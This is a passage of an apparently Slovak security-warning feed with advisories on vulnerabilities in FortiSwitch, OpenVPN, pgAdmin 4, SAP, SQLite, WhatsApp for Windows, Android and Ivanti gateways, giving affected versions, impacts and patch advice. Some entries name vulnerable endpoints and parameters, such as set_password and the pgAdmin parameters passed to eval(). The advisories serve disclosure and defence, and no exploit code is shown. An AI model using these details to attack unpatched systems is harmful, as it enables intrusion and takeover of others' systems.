<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Fortinet FortiSwitch 7.6.0</li>



<li>Fortinet FortiSwitch 7.4.0 až 7.4.4</li>



<li>Fortinet FortiSwitch 7.2.0 až 7.2.8</li>



<li>Fortinet FortiSwitch 7.0.0 až 7.0.10</li>



<li>Fortinet FortiSwitch 6.4.0 až 6.4.14</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-48887 </strong>(CVSS 3.1 skóre: 9,8)</p>



<p>Zraniteľnosť s&nbsp;identifikátorom CVE-2024-48887 sa nachádza v&nbsp;GUI rozhraní a spočíva v&nbsp;nedostatočnom overovaní požiadaviek pre zmenu hesiel. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP požiadaviek cez rozhranie <em>set_password</em> mohol zneužiť na <strong>zmenu prihlasovacích údajov administrátorských účtov</strong>. Tieto kontá by následne mohol zneužiť na <strong>neoprávnený prístup do systému</strong> a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Získanie neoprávneného prístupu do systému</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladnú aktualizáciu FortiSwitch na verzie 7.6.1, 7.4.5, 7.2.9, 7.0.11 a 6.4.15 alebo novšie.</p>



<p>V&nbsp;prípade, že aktualizáciu nie je možné vykonať, zraniteľnosť je možné mitigovať limitovaním prístupu k&nbsp;zariadeniam alebo úplným vypnutím HTTP/HTTPS prístupu z administratívnych rozhraní. Detailný návod môžete nájsť v&nbsp;<a href="https://fortiguard.fortinet.com/psirt/FG-IR-24-435">odporúčaní od výrobcu</a> v&nbsp;časti Workaround.</p>



<p>Taktiež odporúčame vykonať kontrolu logov zariadenia na prítomnosť pokusov o&nbsp;zneužitie tejto zraniteľnosti. Pri preverovaní sa zamerajte na nezvyčajné HTTP požiadavky smerujúce na FortiSwitch a&nbsp;podozrivé aktivity súvisiace s&nbsp;GUI a&nbsp;zmenou hesiel.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://fortiguard.fortinet.com/psirt/FG-IR-24-435">https://fortiguard.fortinet.com/psirt/FG-IR-24-435</a></li>



<li><a href="https://socradar.io/fortinet-cve-2024-48887-fortiswitch-admin-credentials/">https://socradar.io/fortinet-cve-2024-48887-fortiswitch-admin-credentials/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/critical-fortiswitch-flaw-lets-hackers-change-admin-passwords-remotely/">https://www.bleepingcomputer.com/news/security/critical-fortiswitch-flaw-lets-hackers-change-admin-passwords-remotely/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2310/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť v OpenVPN možno zneužiť na zneprístupnenie služby</title>
		<link>/posts/2306</link>
					<comments>/posts/2306#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 22 Apr 2025 11:27:29 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[OpenVPN]]></category>
		<guid isPermaLink="false">/?p=2306</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/04/openvpn-logo.png" alt="" /></p>Vývojári OpenVPN vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú vysoko závažnú zraniteľnosť. Zraniteľnosť s&#160;identifikátorom CVE-2025-2704 možno zneužiť na zneprístupnenie služby....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/04/openvpn-logo.png" alt="" /></p>
<p><strong>Vývojári OpenVPN vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú vysoko závažnú zraniteľnosť. Zraniteľnosť s&nbsp;identifikátorom CVE-2025-2704 možno zneužiť na zneprístupnenie služby.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>OpenVPN vo verziách 2.6.1 až 2.6.13</li>
</ul>



<p>Pozn.: Zraniteľnosť je možné zneužiť len na inštanciách OpenVPN prevádzkovaných v&nbsp;režime servera, ktoré využívajú funkcionalitu TLS-crypt-v2.</p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-2704</strong><strong> </strong>(CVSS 3.1 skóre: 7,5)</p>



<p>Zraniteľnosť spočíva v&nbsp;nedostatočnom overovaní hraničných a&nbsp;chybových stavov a&nbsp;vzdialený neautentifikovaný útočník by ju vo fáze počiatočného handshaku mohol zneužiť na <strong>zneprístupnenie služby</strong>. Zraniteľnosť možno zneužiť opakovaným zasielaním špeciálne vytvorených paketov.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame bezodkladnú aktualizáciu OpenVPN na verziu 2.6.14 alebo novšiu.</p>



<p>Zraniteľnosť možno mitigovať deaktiváciou mechanizmu tls-crypt-v2 v&nbsp;konfiguračnom súbore OpenVPN.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://community.openvpn.net/openvpn/wiki/CVE-2025-2704">https://community.openvpn.net/openvpn/wiki/CVE-2025-2704</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-2704">https://nvd.nist.gov/vuln/detail/CVE-2025-2704</a></li>



<li><a href="https://vulert.com/vuln-db/debian-11-openvpn-187551">https://vulert.com/vuln-db/debian-11-openvpn-187551</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2306/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v nástroji pgAdmin 4</title>
		<link>/posts/2303</link>
					<comments>/posts/2303#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 22 Apr 2025 11:25:26 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[pgAdmin 4]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2303</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/04/pgadmin_4.png" alt="" /></p>Vývojári nástroja na administráciu databáz PostgreSQL pgAdmin 4 vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú 2 kritické zraniteľnosti. CVE-2025-2946 možno...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/04/pgadmin_4.png" alt="" /></p>
<p><strong>Vývojári nástroja na administráciu databáz PostgreSQL pgAdmin 4 vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú 2 kritické zraniteľnosti. CVE-2025-2946 možno zneužiť na realizáciu XSS útokov a CVE-2025-2945 na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>pgAdmin 4 vo verziách starších ako 9.2</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-2945 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 9,9)</p>



<p>Zraniteľnosť spočíva v&nbsp;nedostatočnom overovaní používateľských vstupov v&nbsp;rámci komponentov Query Tool a&nbsp;Cloud Deployment. Hodnoty parametrov <em>query_commited</em> a <em>high_availability</em>, zadávané používateľmi cez požiadavky POST, sú použité ako vstup pre funkciu <em>eval()</em> programovacieho jazyka Python bez ich predošlej sanitizácie. Vzdialený autentifikovaný útočník by ich zaslaním špeciálne vytvorených požiadaviek mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> a&nbsp;<strong>úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong>.</p>



<p><strong>CVE-2025-2946 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 9,1)</p>



<p>CVE-2025-2946 spočíva v&nbsp;nedostatočnom ošetrovaní návratových hodnôt databázových dopytov v&nbsp;rámci komponentov Query Tool a View/Edit Data a&nbsp;možno ich zneužiť na <strong>realizáciu XSS (cross-site scripting) útokov</strong> vedúcich k&nbsp;vykonaniu HTML/JavaScript kódu vo webovom prehliadači obete.</p>



<p>Pozn.: Pre uvedené zraniteľnosti je voľne dostupný proof-of-concept kód demonštrujúci ich zneužitie.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať bezodkladnú aktualizáciu pgAdmin 4 na verziu 9.2 alebo novšiu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.postgresql.org/about/news/pgadmin-4-v92-released-3050/?utm_source=feedly">https://www.postgresql.org/about/news/pgadmin-4-v92-released-3050/?utm_source=feedly</a></li>



<li><a href="https://securityonline.info/pgadmin-4-vulnerabilities-expose-databases-to-remote-code-execution-and-xss/">https://securityonline.info/pgadmin-4-vulnerabilities-expose-databases-to-remote-code-execution-and-xss/</a></li>



<li><a href="https://github.com/pgadmin-org/pgadmin4/issues/8603">https://github.com/pgadmin-org/pgadmin4/issues/8603</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-2945">https://nvd.nist.gov/vuln/detail/CVE-2025-2945</a></li>



<li><a href="https://github.com/pgadmin-org/pgadmin4/issues/8602">https://github.com/pgadmin-org/pgadmin4/issues/8602</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-2946">https://nvd.nist.gov/vuln/detail/CVE-2025-2946</a></li>



<li><a href="https://ccb.belgium.be/advisories/warning-rce-xss-pgadmin4-patch-immediately">https://ccb.belgium.be/advisories/warning-rce-xss-pgadmin4-patch-immediately</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2303/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produktoch SAP</title>
		<link>/posts/2301</link>
					<comments>/posts/2301#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 22 Apr 2025 11:22:51 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[SAP]]></category>
		<guid isPermaLink="false">/?p=2301</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/SAP_zranitelnosti-1.jpg" alt="" /></p>Spoločnosť SAP vydala bezpečnostné aktualizácie na svoje portfólio produktov, ktoré opravujú 20 zraniteľností, z&#160;ktorých 3 sú označené ako kritické. CVE-2025-27429...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/SAP_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>Spoločnosť SAP vydala bezpečnostné aktualizácie na svoje portfólio produktov, ktoré opravujú 20 zraniteľností, z&nbsp;ktorých 3 sú označené ako kritické. CVE-2025-27429 a CVE-2025-31330 v&nbsp;produktoch SAP S</strong><strong>/</strong><strong>4HANA a&nbsp;SAP Landscape Transformation možno zneužiť na vzdialené vykonanie kódu. CVE-2025-30016 v&nbsp;produkte SAP Financial Consolidation možno zneužiť na obídenie mechanizmov autentifikácie.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SAP S/4HANA (Private Cloud) vo verziách S4CORE 102, 103, 104, 105, 106, 107, 108</li>



<li>SAP Landscape Transformation (Analysis Platform) vo verziách DMIS 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731</li>



<li>SAP Financial Consolidation vo verzii FINANCE 1010</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-27429, CVE-2025-31330 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 9,9)</p>



<p>Zraniteľnosti v&nbsp;produktoch <strong>SAP S/4HANA</strong> a <strong>SAP Landscape Transformation (SLT)</strong> sa nachádzajú v&nbsp;bližšie nešpecifikovaných funkciách prístupných prostredníctvom volaní RFC (Remote Function Call). Vzdialený autentifikovaný útočník by ich mohol zneužiť na podvrhnutie špeciálne vytvoreného kódu ABAP (Advanced Business Application Programming), čo by mu umožnilo <strong>obídenie kontrol autorizácie</strong> a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>CVE-2025-30016 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 9,8)</p>



<p><strong>SAP Financial Consolidation</strong> obsahuje zraniteľnosť s&nbsp;identifikátorom CVE-2025-30016, ktorá spočíva v&nbsp;nedostatočnej implementácii mechanizmov autentifikácie. Zraniteľnosť by vzdialený neautentifikovaný útočník mohol zneužiť na <strong>obídenie mechanizmov autentifikácie</strong> a&nbsp;<strong>získanie administrátorského prístupu do systému</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Obídenie mechanizmov autentifikácie</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verzie špecifikované na <a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news/april-2025.html">stránke výrobcu</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news/april-2025.html">https://support.sap.com/en/my-support/knowledge-base/security-notes-news/april-2025.html</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-27429">https://www.cve.org/CVERecord?id=CVE-2025-27429</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-31330">https://www.cve.org/CVERecord?id=CVE-2025-31330</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-30016">https://www.cve.org/CVERecord?id=CVE-2025-30016</a></li>



<li><a href="https://www.securityweek.com/sap-patches-critical-code-injection-vulnerabilities/">https://www.securityweek.com/sap-patches-critical-code-injection-vulnerabilities/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2301/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti v databázovom systéme SQLite</title>
		<link>/posts/2299</link>
					<comments>/posts/2299#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 22 Apr 2025 11:21:52 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[SQLite]]></category>
		<guid isPermaLink="false">/?p=2299</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/SQLite_logo.png" alt="" /></p>Vývojári databázového systému SQLite vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú dve zraniteľnosti. Ich zneužitím možno vyvolať poškodenie pamäte a&#160;zneprístupnenie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/SQLite_logo.png" alt="" /></p>
<p><strong>Vývojári databázového systému SQLite vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú dve zraniteľnosti. Ich zneužitím možno vyvolať poškodenie pamäte a&nbsp;zneprístupnenie služby kvôli pádu aplikácie.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SQLite 3.44.0 až 3.49.0</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-29087 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 9,8 / 3,2)</p>



<p>Zraniteľnosť sa nachádza v&nbsp;SQL funkcii <em>concat_ws()</em> a&nbsp;vzdialený neautentifikovaný útočník by ju zaslaním veľkých reťazcov (2MB alebo väčšie) mohol zneužiť na <strong>pretečenie celočíselnej premennej</strong> a&nbsp;následné <strong>vyvolanie poškodenia pamäte</strong>.</p>



<p><strong>CVE-2025-29088 </strong><strong>&nbsp;</strong>(CVSS 3.1 skóre: 7,5 / 5,6)</p>



<p>Zraniteľnosť spočíva v&nbsp;nesprávnej implementácii operácie násobenia sz*nBig. Zaslaním špeciálne vytvorených argumentov do sqlite3_db_config používaného v&nbsp;rámci API rozhrania programovacieho jazyka C možno spôsobiť nesprávnu alokáciu pamäte, čo môže viesť ku pádu aplikácie, resp.&nbsp;<strong>zneprístupneniu služby</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Poškodenie pamäte</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu SQLite na verziu 3.49.1.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://sqlite.org/releaselog/3_49_1.html">https://sqlite.org/releaselog/3_49_1.html</a></li>



<li><a href="https://www.cvedetails.com/cve/CVE-2025-29087/">https://www.cvedetails.com/cve/CVE-2025-29087/</a></li>



<li><a href="https://www.cvedetails.com/cve/CVE-2025-29088">https://www.cvedetails.com/cve/CVE-2025-29088</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-29087">https://nvd.nist.gov/vuln/detail/CVE-2025-29087</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-29088">https://nvd.nist.gov/vuln/detail/CVE-2025-29088</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2299/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť aplikácie WhatsApp for Windows umožňovala vzdialené vykonanie kódu</title>
		<link>/posts/2296</link>
					<comments>/posts/2296#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 22 Apr 2025 11:20:23 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[WhatsApp]]></category>
		<guid isPermaLink="false">/?p=2296</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/04/WhatsApp_logo1.svg_-1024x800.png" alt="" /></p>Spoločnosť Meta vydala bezpečnostné aktualizácie pre aplikáciu WhatsApp for Windows, ktoré opravujú bezpečnostnú zraniteľnosť CVE-2025-30401. Napriek tomu, že sa jedná...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/04/WhatsApp_logo1.svg_-1024x800.png" alt="" /></p>
<p><strong>Spoločnosť Meta vydala bezpečnostné aktualizácie pre aplikáciu WhatsApp for Windows, ktoré opravujú bezpečnostnú zraniteľnosť CVE-2025-30401. Napriek tomu, že sa jedná o&nbsp;zraniteľnosť strednej závažnosti, možno ju zneužiť na vzdialené vykonanie škodlivého kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WhatsApp for Windows vo verziách starších ako 2.2450.6</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-30401</strong><strong> </strong>(CVSS 3.1 skóre: 6,7)</p>



<p>Zraniteľnosť spočíva v&nbsp;nekonzistencii vyhodnocovania typu súborov, ktoré aplikácia WhatsApp zobrazuje na základe MIME typu, ale po kliknutí sú otvárané asociovaným programom na základe ich prípony. Tento nesúlad je možné podvrhnutím špeciálne vytvorených súborov zneužiť na realizáciu tzv. <strong>spoofing útokov</strong> vedúcich k&nbsp;<strong>vzdialenému vykonaniu kódu</strong>.</p>



<p><strong>Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa</strong>, ktorý musí predmetný súbor otvoriť na svojom zariadení.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Používateľom aplikácie WhatsApp for Windows odporúčame vykonať bezodkladnú aktualizáciu na verziu 2.2450.6 alebo novšiu.</p>



<p>Používateľom odporúčame neinteragovať so správami a&nbsp;prílohami prijatými z neznámych a&nbsp;nedôveryhodných zdrojov.</p>



<p>Vzhľadom na aktuálne prebiehajúcu <a href="https://zive.aktuality.sk/clanok/Znc4VS9/novy-whatsapp-podvod-ako-od-slovakov-lanaria-peniaze-ukazky/">phishingovú kampaň zameranú na používateľov WhatsApp</a> odporúčame venovať zvýšenú pozornosť aj podozrivým správam prijatým od známych. Útočníci cez platfomu WhatsApp rozposielajú žiadosti o&nbsp;hlasovanie v&nbsp;tanečnej súťaži, ktoré obsahujú URL odkazy vedúce na stránky s&nbsp;phishingovým obsahom. Sofistikovaný phishing sa snaží presvedčiť používateľa na&nbsp;pridanie zariadenia útočníka do zoznamu prepojených zariadení (eng. Linked Devices), čo im umožňuje úplný prístup ku kontaktom, správam a&nbsp;taktiež rozposielanie správ. V&nbsp;súvislosti s&nbsp;touto kampaňou Národné centrum kybernetickej bezpečnosti vydalo na svojej stránke <a href="https://www.sk-cert.sk/sk/nova-vlna-podvodnych-kampani">varovanie</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.whatsapp.com/security/advisories/2025/">https://www.whatsapp.com/security/advisories/2025/</a></li>



<li><a href="https://www.facebook.com/security/advisories/cve-2025-30401">https://www.facebook.com/security/advisories/cve-2025-30401</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-30401">https://nvd.nist.gov/vuln/detail/CVE-2025-30401</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/whatsapp-flaw-can-let-attackers-run-malicious-code-on-windows-pcs/">https://www.bleepingcomputer.com/news/security/whatsapp-flaw-can-let-attackers-run-malicious-code-on-windows-pcs/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2296/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Google opravil 2 aktívne zneužívané zero-day zraniteľnosti operačného systému Android</title>
		<link>/posts/2294</link>
					<comments>/posts/2294#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 10 Apr 2025 11:36:13 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=2294</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/android-1024x683.jpg" alt="" /></p>Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj operačný systém Android, ktoré opravujú 62 zraniteľností, z čoho 4 je označených ako...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/android-1024x683.jpg" alt="" /></p>
<p><strong>Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj operačný systém Android, ktoré opravujú 62 zraniteľností, z čoho 4 je označených ako kritické a 2 ako aktívne zneužívané.</strong> <strong>CVE-2024-53150 a CVE-2024-53197 v kerneli možno zneužiť na eskaláciu privilégií a&nbsp;získanie neoprávneného prístupu k&nbsp;citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Zariadenia s&nbsp;operačným systémom Android bez aktualizácie z&nbsp;05.04.2025</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Kritické zraniteľnosti:</u></strong></p>



<p>Najzávažnejšie zraniteľnosti možno zneužiť na <strong>získanie neoprávneného prístupu k citlivým údajom</strong> (CVE-2025-22429, CVE-2024-45551), <strong>eskaláciu privilégií</strong> (CVE-2025-26416) a&nbsp;<strong>zneprístupnenie služby</strong> (CVE-2025-22423).</p>



<p><strong><u>Aktívne zneužívané zraniteľnosti:</u></strong></p>



<p><strong>CVE-2024-53150 </strong>(CVSS 3.1 skóre: 7,8)</p>



<p>Zraniteľnosť v&nbsp;kerneli Androidu sa nachádza v ovládači&nbsp;USB-audio pre ALSA. Spočíva v&nbsp;absencii kontroly parametra deskriptorov bLength.&nbsp;Možno ju zneužiť na čítanie mimo povolených hodnôt pamäte a získanie <strong>neoprávneného prístupu k&nbsp;citlivým údajom</strong>.</p>



<p><strong>CVE-2024-53197 </strong>(CVSS 3.1 skóre: 7,8)</p>



<p>Zraniteľnosť v&nbsp;kerneli Androidu sa nachádza v ovládači&nbsp;USB-audio pre zariadenia ALSA a spočíva v možnosti čítania pamäte mimo povolené hodnoty. Zraniteľnosť možno zneužiť na <strong>eskaláciu privilégií</strong>.</p>



<p><strong>Pozn.: Zraniteľnosti s&nbsp;označením CVE-2024-53150 a CVE-2024-53197 sú v&nbsp;súčasnosti aktívne zneužívané.</strong></p>



<p><strong>Na základe </strong><a href="https://securitylab.amnesty.org/latest/2025/02/cellebrite-zero-day-exploit-used-to-target-phone-of-serbian-student-activist/"><strong>analýzy Amnesty International</strong></a><strong> </strong>(ďalej len AI)<strong> bola zraniteľnosť CVE-2024-53197 využívaná v rámci forenzných nástrojov Cellebrite, ktoré boli údajne v roku 2024 zneužité srbskou vládou na odomknutie Android zariadenia aktivistu a&nbsp;pokuse o&nbsp;inštaláciu spyvéru. </strong>Spoločnosť Cellebrite sa špecializuje na vývoj špecializovaných produktov určených pre orgány činné v trestnom konaní, spravodajské služby a forenzných špecialistov. <strong>V nadväznosti na uvedené analýzy Cellebrite ukončila poskytovanie svojich služieb a&nbsp;produktov pre bližšie nešpecifikovaných zákazníkov v Srbsku.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Zneprístupnenie služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať bezodkladnú inštaláciu aktualizácií operačného systému Android z&nbsp;5. apríla 2025.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://source.android.com/docs/security/bulletin/2025-04-01">https://source.android.com/docs/security/bulletin/2025-04-01</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-53150">https://nvd.nist.gov/vuln/detail/CVE-2024-53150</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-53197">https://nvd.nist.gov/vuln/detail/CVE-2024-53197</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/google-fixes-android-zero-days-exploited-in-attacks-60-other-flaws/">https://www.bleepingcomputer.com/news/security/google-fixes-android-zero-days-exploited-in-attacks-60-other-flaws/</a></li>



<li><a href="https://thehackernews.com/2025/04/google-releases-android-update-to-patch.html">https://thehackernews.com/2025/04/google-releases-android-update-to-patch.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2294/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v produktoch Ivanti ICS, IPS a ZTA Gateway</title>
		<link>/posts/2292</link>
					<comments>/posts/2292#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 10 Apr 2025 11:34:54 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Ivanti]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2292</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre svoje produkty Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS) a&#160;ZTA Gateways, ktoré opravujú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre svoje produkty Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS) a&nbsp;ZTA Gateways, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť. CVE-2025-22457 možno zneužiť na vzdialené vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Pulse Connect Secure vo verziách starších ako 9.1R18.9 (vrátane, produkt s&nbsp;ukončenou podporou)</li>



<li>Ivanti Connect Secure vo verziách starších ako 22.7R2.6</li>



<li>Ivanti Policy Secure vo verziách starších ako 22.7R1.3 (vrátane)</li>



<li>ZTA Gateways vo verziách starších ako 22.8R2 (vrátane)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-22457 </strong>(CVSS skóre 9,0)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;pretečení vyrovnávacej pamäte zásobníka a&nbsp;vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>.</p>



